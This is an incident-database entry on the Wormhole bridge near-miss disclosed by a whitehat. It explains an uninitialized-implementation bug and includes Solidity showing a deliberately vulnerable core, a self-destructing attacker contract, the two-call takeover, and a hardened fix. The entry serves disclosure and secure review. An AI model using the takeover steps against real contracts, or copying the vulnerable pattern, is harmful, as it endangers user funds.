ID: wormhole-1110
Date: February 24, 2022
Status: Near-Miss
Incident Count: 2
Contributor: blockthreat.substack.com
KYC: None
Audits: Neodyme AG
Loss Amount: -
Recovered: -
Rewards: 10,000,000
Currency: USD

Key Indicators
Platform: Multi-chains
Type: Protocol
Category: Bridge
Method: Near-Miss
Extended Method: The core bridge's UUPS-style implementation contract was left uninitialized, so anyone could initialize it directly with a Guardian set they controlled and, acting as that Guardian, upgrade the implementation itself to a contract that self-destructs, destroying the logic the proxy depends on and locking user funds in the bridge.

Days in Operation: 440 (1.21 Years)

A whitehat who goes by the pseudonym satya0x responsibly disclosed a critical bug in the Wormhole core bridge contract on Ethereum. The bug was in the bridge's upgradeable proxy setup: the implementation contract could be taken over and self-destructed, which would have locked the funds held by the bridge with no path to recovery; the disclosure prevented that outcome. It is yet another example of the strategic value a multi-million dollar bug bounty program can have for a Web3 security program.

Wormhole paid satya0x a record bug bounty of $10 million for the find. It is one thing to create a program with a very high top payout; Wormhole has shown that it is serious about paying top dollar to mitigate security issues in partnership with the whitehat community.

Wormhole uses a UUPS-style proxy, where the upgrade logic resides in the implementation contract rather than in the proxy. The difference from a plain UUPS setup is that an upgrade must be authorized by the Guardians, who produce a multi-signature message stating that the upgrade to the new implementation address is approved. However, the implementation contract at 0x736d2a394f7810c17b3c6fed017d5bc7d60c077d was uninitialized, because a previous bugfix had reverted the original initialization. Since the implementation's own storage is separate from the proxy's, an attacker could call the initializer directly on the implementation address (not through the proxy) and install a Guardian set they controlled. Acting as that Guardian, they could then submit an upgrade whose initializer self-destructs; because the upgrade runs the new code by delegatecall in the caller's context, that call made directly on the implementation would have destroyed the implementation itself, leaving the proxy pointing at an address with no code and, since the upgrade logic lived in the destroyed contract, no way to repair it.
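The pattern described above, as an added illustration that is not Wormhole's code: a minimal UUPS-style core whose initializer can be reached directly on the implementation, the attacker's self-destructing upgrade target, a minimal EIP-1967 proxy, and the hardened variant that marks the implementation's own storage initialized at deployment. The contract and function names are assumptions, and the single-signer guardian check stands in for the real bridge's threshold signature verification.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added illustration, not Wormhole's code. Names and the simplified
// guardian check are assumptions made for this example.

// EIP-1967 implementation slot: keccak256("eip1967.proxy.implementation") - 1
bytes32 constant IMPL_SLOT =
    0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;

// UUPS-style core: the upgrade logic lives here, in the implementation.
// Through the proxy every state write lands in the proxy's storage; called
// directly, the same code writes to the implementation's own storage.
contract BridgeCoreVulnerable {
    bool public initialized;
    address[] public guardians;

    // Intended to run once, through the proxy. Nothing prevents a direct
    // call on the implementation address, whose own copy of `initialized`
    // is still false.
    function initialize(address[] memory initialGuardians) external {
        require(!initialized, "already initialized");
        initialized = true;
        guardians = initialGuardians;
    }

    // Simplified stand-in for threshold signature verification.
    modifier onlyGuardian() {
        bool ok = false;
        for (uint256 i = 0; i < guardians.length; i++) {
            if (guardians[i] == msg.sender) { ok = true; break; }
        }
        require(ok, "not a guardian");
        _;
    }

    function submitContractUpgrade(address newImplementation) external onlyGuardian {
        bytes32 slot = IMPL_SLOT;
        assembly { sstore(slot, newImplementation) }
        // Runs the new code in the *current* context. Via the proxy that is
        // the proxy; via a direct call it is this implementation contract.
        (bool ok, ) = newImplementation.delegatecall(
            abi.encodeWithSignature("initialize()")
        );
        require(ok, "upgrade initializer failed");
    }
}

// Attacker's "upgrade": its initializer destroys whatever delegatecalls it.
contract SelfDestructingImpl {
    function initialize() external {
        selfdestruct(payable(msg.sender));
    }
}

// Minimal proxy: every call is delegated to the address in IMPL_SLOT. Once
// that address holds no code, delegatecall returns success with empty
// return data, so the bridge silently stops working and cannot be upgraded.
contract BridgeProxy {
    constructor(address impl, bytes memory initData) {
        bytes32 slot = IMPL_SLOT;
        assembly { sstore(slot, impl) }
        (bool ok, ) = impl.delegatecall(initData);
        require(ok, "proxy init failed");
    }

    fallback() external payable {
        bytes32 slot = IMPL_SLOT;
        assembly {
            let impl := sload(slot)
            calldatacopy(0, 0, calldatasize())
            let ok := delegatecall(gas(), impl, 0, calldatasize(), 0, 0)
            returndatacopy(0, 0, returndatasize())
            switch ok
            case 0 { revert(0, returndatasize()) }
            default { return(0, returndatasize()) }
        }
    }
}

// Hardened form: the implementation's own storage is marked initialized at
// deployment, so initialize() only ever succeeds in a proxy's context and
// the direct takeover path is closed. (OpenZeppelin's Initializable
// provides _disableInitializers() for the same purpose.)
contract BridgeCoreHardened is BridgeCoreVulnerable {
    constructor() {
        initialized = true;
    }
}
```

Deploy BridgeCoreVulnerable, then BridgeProxy with its address and the encoded initialize(guardians) call; the proxy works as intended. The takeover is two direct calls to the implementation address that never touch the proxy: initialize([attacker]) and then submitContractUpgrade(address of SelfDestructingImpl). The review check is the same shape: read initialized and the guardian set from the implementation address itself, not through the proxy, and confirm the initializer is already unusable there. One caveat: since the Cancun upgrade (EIP-6780) selfdestruct only removes code in the transaction that created the contract, so the permanent-lockup outcome no longer reproduces on current Ethereum mainnet; an initializable implementation is still a defect a review should flag, and the check above is unchanged.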

info.png

DISCLAIMER: While web3rekt has used its best efforts in aggregating and maintaining this database, this web site makes no representations or warranties with respect to the accuracy or completeness of the information and data herein, and specifically disclaims any implied warranties of merchantability or fitness for any particular purpose.

Under no circumstances shall web3rekt be liable for any loss of profit or funds, any regulatory or governmental penalties, any legal costs, or any other commercial and non-commercial damages, including but not limited to special, incidental, consequential, or other damages arising from any or all usage of the data and information derived from this database.